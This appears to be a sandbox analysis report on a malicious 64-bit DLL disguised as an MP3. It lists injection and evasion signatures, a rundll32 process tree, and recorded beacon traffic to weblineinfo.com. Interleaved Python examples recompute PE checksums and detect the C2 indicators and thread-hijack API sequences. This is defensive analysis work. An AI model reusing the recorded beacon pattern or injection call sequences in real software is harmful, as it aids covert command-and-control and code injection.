
Windows Analysis Report
10kmr9d7.dll

Overview

General Information

Sample name: 10kmr9d7.dll (renamed file extension from mp3 to dll)
Original sample name: 10kmr9d7.mp3
Analysis ID: 1490633
MD5: 7abbf9f2106c2dd1e69110c6c6b8dbc6
SHA1: 05cf0a54c0e62d170b6ff9bb0108b70164a0e681
SHA256: 44f5ebb4facaba45274f08437a1f980bbbdb209cbd016ead76e4ec1afaca4dc2

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
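Added example, not part of the Joe Sandbox report: the signatures "PE file contains an invalid checksum" and "Sample file is different than original file name gathered from version info", together with the .mp3-to-.dll rename, are header facts an analyst can re-check independently before trusting the verdict. The Python below recomputes the PE/COFF CheckSum with the algorithm imagehlp's CheckSumMappedFile uses and reports whether the stored value is valid, absent (zero) or mismatched, plus whether the file really is a 64-bit DLL behind its audio extension. It builds a tiny PE header in memory so it runs offline; that constructed header and a fake ID3-tagged "mp3" are the example's own test inputs, nothing is read from the analysed sample.

```python
# Added example (not from the Joe Sandbox report or the analysed DLL): recompute the
# PE/COFF CheckSum and read the header facts a triage analyst checks when a sample
# arrives as ".mp3" but is loaded as a DLL. The PE built below is constructed
# in-memory so the script runs offline; call describe(open(path, "rb").read())
# on a real file.
import struct

IMAGE_FILE_DLL = 0x2000            # COFF Characteristics bit
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32PLUS_MAGIC = 0x20B
OPT_CHECKSUM_OFFSET = 64           # CheckSum sits at +64 in both PE32 and PE32+ optional headers


def pe_checksum(data: bytes) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum as imagehlp does: a 32-bit
    sum with end-around carry over the whole file, skipping the CheckSum dword
    itself, folded to 16 bits, plus the file length. Assumes e_lfanew is
    4-byte aligned, which linker-produced files satisfy."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = e_lfanew + 24 + OPT_CHECKSUM_OFFSET   # 4-byte signature + 20-byte COFF header
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return total + len(data)


def describe(data: bytes) -> dict:
    """Header facts worth recording in a triage note."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"is_pe": False}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"is_pe": False}
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    stored = struct.unpack_from("<I", data, e_lfanew + 24 + OPT_CHECKSUM_OFFSET)[0]
    computed = pe_checksum(data)
    if stored == 0:
        state = "absent"      # linker never filled it in; common for user-mode binaries
    elif stored == computed:
        state = "valid"
    else:
        state = "invalid"     # header edited or file modified after the checksum was written
    return {
        "is_pe": True,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "x64": machine == IMAGE_FILE_MACHINE_AMD64,
        "pe32plus": magic == PE32PLUS_MAGIC,
        "stored_checksum": stored,
        "computed_checksum": computed,
        "checksum_state": state,
    }


def build_sample_pe(stored_checksum=None) -> bytes:
    """Constructed minimal PE32+ DLL header (no sections) for the offline demo.
    stored_checksum=None writes the correct value; any other number simulates
    a header that no longer matches the file."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    # "PE\0\0", Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (EXECUTABLE | LARGE_ADDRESS_AWARE | DLL)
    coff = struct.pack("<IHHIIIHH", 0x00004550, IMAGE_FILE_MACHINE_AMD64, 0, 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 56, 0x1000)                     # SizeOfImage
    struct.pack_into("<I", opt, 60, 64 + 24 + 240)              # SizeOfHeaders
    data = bytearray(dos + coff + opt)
    if stored_checksum is None:
        stored_checksum = pe_checksum(bytes(data))
    struct.pack_into("<I", data, 64 + 24 + OPT_CHECKSUM_OFFSET, stored_checksum)
    return bytes(data)


if __name__ == "__main__":
    for label, blob in (("correct header", build_sample_pe()),
                        ("tampered header", build_sample_pe(0xDEADBEEF)),
                        ("real mp3 (ID3 tag)", b"ID3\x03\x00" + b"\0" * 100)):
        print(label, describe(blob))
```

A stored checksum of zero is normal for user-mode binaries, since the loader only enforces the field for drivers and a few boot images; only a non-zero value that fails recomputation supports the reading that the header was changed after linking. A genuine MP3 begins with an ID3 tag or an MPEG frame sync, never with MZ, so the `is_pe` result alone settles the extension question.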

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 3504 cmdline: loaddll64.exe "C:\Users\user\Desktop\10kmr9d7.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6412 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5812 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5908 cmdline: rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperations MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3480 cmdline: rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Create MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4028 cmdline: rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Destroy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5996 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CancelAllOperations MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6112 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Create MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6460 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Destroy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 180 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetTxtReplaceData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4524 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueReplaceData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4448 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueDeleteData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5316 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetBasicData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4124 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_Delete MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1960 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ShutdownTargetDLL MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 760 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetMaxLogLevel MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4440 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetLogCallback MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5332 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsV2 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 984 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActions MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 616 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessPendingActionsAfterReboot MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6576 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_PrepareUpdate MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3160 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_IsDLLNewlyLoaded MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6584 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_InitTargetDLL MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4052 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMinorAPIVersion MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4720 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMajorAPIVersion MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6172 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsV2 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1848 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreats MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6508 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_FinishUpdate MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180015BF0 BCryptOpenAlgorithmProvider,BCryptImportKeyPair,BCryptVerifySignature,BCryptDestroyKey,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_0000000180015BF0
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180015700 Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,BCryptOpenAlgorithmProvider,BCryptGetProperty,BCryptGetProperty,BCryptCreateHash,BCryptHashData,BCryptFinishHash,BCryptCloseAlgorithmProvider,BCryptDestroyHash,6_2_0000000180015700
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180015F90 BCryptOpenAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptImportKeyPair,BCryptVerifySignature,BCryptDestroyKey,6_2_0000000180015F90
Source: unknown | HTTPS traffic detected: 62.192.173.45:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 62.192.173.45:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: Binary string: D:\JENKINS\workspace\N_CleanActions\bin\x64\Release\ActionsShim.pdb source: rundll32.exe, 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.3272319252.0000000180154000.00000002.00000001.01000000.00000003.sdmp, 10kmr9d7.dll
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800143C0 GetLogicalDriveStringsW,QueryDosDeviceW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,6_2_00000001800143C0

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 62.192.173.45 443
Source: Joe Sandbox View | ASN Name: HUGESERVER-NETWORKSUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: 12 requests, identical apart from the body size (2 with Content-Length: 735, 10 with Content-Length: 335):
POST /flags/api/v2/frontend/experimentValues HTTP/1.1
Accept: */*
Content-Type: application/json
X-Client-Name: feature-gate-js-client
X-Client-Version: 4.8.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: weblineinfo.com
Content-Length: 735 (or 335)
Connection: Keep-Alive
Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: weblineinfo.com
Source: unknown | HTTP traffic detected:
POST /flags/api/v2/frontend/experimentValues HTTP/1.1
Accept: */*
Content-Type: application/json
X-Client-Name: feature-gate-js-client
X-Client-Version: 4.8.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: weblineinfo.com
Content-Length: 735
Connection: Keep-Alive
Cache-Control: no-cache
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD64000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2724309581.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273047761.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/
Source: rundll32.exe, 00000006.00000003.2724449942.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273047761.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2724309581.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/=cn
Source: rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/D
Source: rundll32.exe, 00000009.00000003.2515439108.000001B0A1B8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues
Source: rundll32.exe, 00000006.00000003.2097914667.000002357ADD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues%$
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2515439108.000001B0A1B61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues(
Source: rundll32.exe, 00000009.00000003.2515439108.000001B0A1B8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues.com
Source: rundll32.exe, 00000006.00000002.3273047761.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesA
Source: rundll32.exe, 00000009.00000003.2515439108.000001B0A1B8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesCX
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesFY
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2157181635.000001B0A1B61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2515439108.000001B0A1B61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesOIDInfo
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesS
Source: rundll32.exe, 00000006.00000003.2097977756.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesV
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesZ
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesich
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1AC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValueslk?
Source: rundll32.exe, 00000006.00000002.3273047761.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesp
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesps-
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/graphy
Source: rundll32.exe, 00000006.00000003.2376171753.000002357ADAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://weblineinfo.com/r
Source: unknown | Network traffic detected: HTTP traffic on port 443 in both directions (443 -> client port and client port -> 443) for client ports 49704, 49705, 49706, 49707, 49715, 49716, 49718, 49719, 49720, 49721, 49722, 49723
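Added example, not code from the report: the network section above records a complete beacon shape (destination 62.192.173.45, Host weblineinfo.com, repeated POSTs to /flags/api/v2/frontend/experimentValues carrying an X-Client-Name: feature-gate-js-client header and a Chrome 90 User-Agent, issued by rundll32.exe). The Python below scores flow records against those indicators and against two behavioural rules that outlive a change of infrastructure: a header claiming to be a JavaScript feature-flag client, or a browser User-Agent, sent by a process that is not a browser. The Flow records, the browser list and the EDR process-name join are constructed for the demo and are not taken from the report's capture.

```python
# Added example (not from the Joe Sandbox report): match proxy / TLS flow records
# against the network indicators recorded in the report. The Flow records below
# are constructed; in practice load them from Zeek http.log / ssl.log or a proxy
# export and join the owning process name from EDR telemetry.
from dataclasses import dataclass, field

# Indicators copied verbatim from the report
C2_IP = "62.192.173.45"
C2_HOST = "weblineinfo.com"
C2_PATH = "/flags/api/v2/frontend/experimentValues"
C2_JA3 = "37f463bf4616ecd445d4a1937da06e19"
C2_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
         "(KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")   # assumption: adapt to your browser inventory


@dataclass
class Flow:
    dst_ip: str
    ja3: str = ""                 # empty when the sensor only saw plaintext
    method: str = ""              # empty for TLS-only records
    host: str = ""
    path: str = ""
    headers: dict = field(default_factory=dict)
    process: str = ""             # image name joined from EDR, if available


def indicators(flow: Flow) -> list:
    """Return the indicator names a flow matches, strongest first."""
    hits = []
    headers = {k.lower(): v for k, v in flow.headers.items()}
    if flow.dst_ip == C2_IP:
        hits.append("c2-ip")
    if flow.host.lower() == C2_HOST:
        hits.append("c2-host")
    if flow.method == "POST" and flow.path == C2_PATH:
        hits.append("c2-uri")
    # Behavioural rules: the beacon claims to be a JavaScript feature-flag client and
    # a Chrome browser, but the socket belongs to a non-browser process.
    proc = flow.process.lower()
    if proc and proc not in BROWSERS:
        if headers.get("x-client-name") == "feature-gate-js-client":
            hits.append("js-client-header-from-non-browser")
        if headers.get("user-agent") == C2_UA:
            hits.append("browser-ua-from-non-browser")
    # JA3 is weak on its own: a Windows schannel/WinHTTP fingerprint is shared by
    # plenty of legitimate software, so it only corroborates.
    if flow.ja3 == C2_JA3:
        hits.append("ja3-match (weak)")
    return hits


def hunt(flows):
    """Return (index, confidence, hits) for every flow with at least one hit;
    a flow whose only hit is the JA3 fingerprint is reported as low confidence."""
    results = []
    for i, flow in enumerate(flows):
        hits = indicators(flow)
        if hits:
            confidence = "low" if hits == ["ja3-match (weak)"] else "high"
            results.append((i, confidence, hits))
    return results


# Constructed sample records (not from the report's pcap)
SAMPLE_FLOWS = [
    Flow(dst_ip=C2_IP, ja3=C2_JA3, method="POST", host=C2_HOST, path=C2_PATH,
         headers={"Content-Type": "application/json", "X-Client-Name": "feature-gate-js-client",
                  "X-Client-Version": "4.8.1", "User-Agent": C2_UA},
         process="rundll32.exe"),
    Flow(dst_ip="203.0.113.10", ja3="placeholder-ja3-of-a-real-browser", method="GET",
         host="example.com", path="/",
         headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0 Safari/537.36"},
         process="chrome.exe"),
    Flow(dst_ip="198.51.100.7", ja3=C2_JA3, process="svchost.exe"),   # TLS-only, fingerprint collision
]

if __name__ == "__main__":
    for idx, confidence, hits in hunt(SAMPLE_FLOWS):
        print(f"flow {idx}: {confidence} confidence, matched {hits}")
```

Treat the JA3 match as corroboration only: the fingerprint of a Windows schannel or WinHTTP client is shared by a great deal of legitimate software, which is why the report itself says no more than that it was "seen in connection with other malware". The two behavioural rules are the ones worth keeping once the domain and IP have rotated.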
Source: C:\Windows\System32\rundll32.exe | Code function: 6_3_000002357C73D6CA NtProtectVirtualMemory,6_3_000002357C73D6CA
Source: C:\Windows\System32\rundll32.exe | Code function: 6_3_000002357C73D65A NtAllocateVirtualMemory,6_3_000002357C73D65A
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180006560 NtAllocateVirtualMemory,NtProtectVirtualMemory,6_2_0000000180006560
Source: C:\Windows\System32\rundll32.exe | Code function: 9_3_000001B0A35AD6CA NtProtectVirtualMemory,9_3_000001B0A35AD6CA
Source: C:\Windows\System32\rundll32.exe | Code function: 9_3_000001B0A35AD65A NtAllocateVirtualMemory,9_3_000001B0A35AD65A
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35CF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,9_2_000001B0A35CF3A0
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35E4740 NtFreeVirtualMemory,9_2_000001B0A35E4740
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35E4360 NtCreateThreadEx,9_2_000001B0A35E4360
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35E45F0 NtDuplicateObject,9_2_000001B0A35E45F0
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35C55C0 NtTerminateThread,9_2_000001B0A35C55C0
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35E51C0 NtReadVirtualMemory,9_2_000001B0A35E51C0
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35B71B0 NtClose,9_2_000001B0A35B71B0
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35C7A50 NtSetContextThread,9_2_000001B0A35C7A50
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35C8149 NtSetContextThread,9_2_000001B0A35C8149
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35E4BE0 NtProtectVirtualMemory,9_2_000001B0A35E4BE0
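Added example, not from the report: the native calls listed above for rundll32.exe (NtAllocateVirtualMemory and NtProtectVirtualMemory, CreateToolhelp32Snapshot/Thread32First walking threads, NtSuspendThread, NtSetContextThread, NtResumeThread, NtCreateThreadEx) are the building blocks behind the "thread injection" and "Sets debug register" signatures, and most of them sit at addresses outside the DLL image (the 6_3_000002357C... and 9_2_000001B0A35... functions, against the 6_2_0000000180... functions inside the loaded module). The Python below checks a per-process API trace for those ordered sequences and for a CONTEXT_DEBUG_REGISTERS request passed to NtSetContextThread. The trace, PIDs and argument values are constructed for the demo; the report does not expose call arguments.

```python
# Added example (not from the Joe Sandbox report): turn the API call sequence the
# report attributes to rundll32.exe into a per-process detector over an API trace.
# The trace below is constructed; PIDs and argument values are made up.
from collections import defaultdict

# Win32 constants (x64)
CONTEXT_AMD64 = 0x00100000
CONTEXT_DEBUG_REGISTERS = CONTEXT_AMD64 | 0x10      # Dr0-Dr3, Dr6, Dr7 included in the CONTEXT
PAGE_EXECUTE_MASK = 0xF0                            # PAGE_EXECUTE* protections (0x10/0x20/0x40/0x80)

# Ordered API sequences; each must appear in order within one process, other calls may be interleaved.
PATTERNS = {
    "thread context hijack": ("NtAllocateVirtualMemory", "NtProtectVirtualMemory",
                              "NtSuspendThread", "NtSetContextThread", "NtResumeThread"),
    "executable allocation followed by NtCreateThreadEx": ("NtAllocateVirtualMemory",
                                                           "NtProtectVirtualMemory", "NtCreateThreadEx"),
}


def is_subsequence(pattern, calls):
    """True if every API in pattern occurs in calls in that order, not necessarily adjacent."""
    it = iter(calls)
    return all(any(call == wanted for call in it) for wanted in pattern)


def detect(events):
    """events: iterable of {"pid", "api", "args"} dicts in chronological order.
    Returns {pid: [finding, ...]} for every process with at least one finding."""
    per_pid = defaultdict(list)
    for ev in events:
        per_pid[ev["pid"]].append(ev)
    report = {}
    for pid, evs in per_pid.items():
        calls = [e["api"] for e in evs]
        findings = [name for name, pat in PATTERNS.items() if is_subsequence(pat, calls)]
        for e in evs:
            flags = e.get("args", {}).get("ContextFlags", 0)
            if e["api"] == "NtSetContextThread" and (flags & CONTEXT_DEBUG_REGISTERS) == CONTEXT_DEBUG_REGISTERS:
                findings.append("debug registers written via NtSetContextThread")
                break
        if any(e["api"] == "NtProtectVirtualMemory" and e.get("args", {}).get("NewProtect", 0) & PAGE_EXECUTE_MASK
               for e in evs):
            findings.append("memory made executable (weak alone: JITs do this too)")
        if findings:
            report[pid] = findings
    return report


# Constructed trace modelled on the call names in the report (PIDs and args invented)
SAMPLE_TRACE = [
    {"pid": 1234, "api": "NtAllocateVirtualMemory", "args": {"Protect": 0x04}},     # PAGE_READWRITE
    {"pid": 1234, "api": "NtProtectVirtualMemory", "args": {"NewProtect": 0x20}},   # PAGE_EXECUTE_READ
    {"pid": 1234, "api": "CreateToolhelp32Snapshot"},
    {"pid": 1234, "api": "Thread32First"},
    {"pid": 1234, "api": "NtSuspendThread"},
    {"pid": 1234, "api": "NtSetContextThread", "args": {"ContextFlags": CONTEXT_DEBUG_REGISTERS}},
    {"pid": 1234, "api": "NtResumeThread"},
    {"pid": 1234, "api": "NtCreateThreadEx"},
    # A JIT-like process: allocates executable memory but never touches other threads.
    {"pid": 4242, "api": "NtAllocateVirtualMemory"},
    {"pid": 4242, "api": "NtProtectVirtualMemory", "args": {"NewProtect": 0x40}},   # PAGE_EXECUTE_READWRITE
]

if __name__ == "__main__":
    for pid, findings in detect(SAMPLE_TRACE).items():
        print(pid, findings)
```

The ordering matters more than the individual calls: NtAllocateVirtualMemory followed by an executable protection is routine for JIT runtimes, which is why that finding is marked weak, while the same allocation followed by suspending a thread, rewriting its CONTEXT and resuming it has no benign equivalent worth whitelisting. A CONTEXT with the debug-register flag set is what makes a hardware breakpoint hijack possible without touching the target's code pages.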
Source: C:\Windows\System32\rundll32.exe | Code functions (process 6, no named API calls): 6_2_000000018012A000, 6_2_0000000180001D60, 6_2_000000018012C804, 6_2_00000001801178AC, 6_2_00000001800150D0, 6_2_00000001801310C8, 6_2_0000000180118A10, 6_2_0000000180117290, 6_2_0000000180117AB0, 6_2_000000018012D318, 6_2_0000000180126B04, 6_2_000000018011A3C0, 6_2_00000001800143C0, 6_2_000000018012CC98, 6_2_000000018000FE05, 6_2_0000000180123610, 6_2_0000000180006560, 6_2_00000001801176A0, 6_2_0000000180139F04
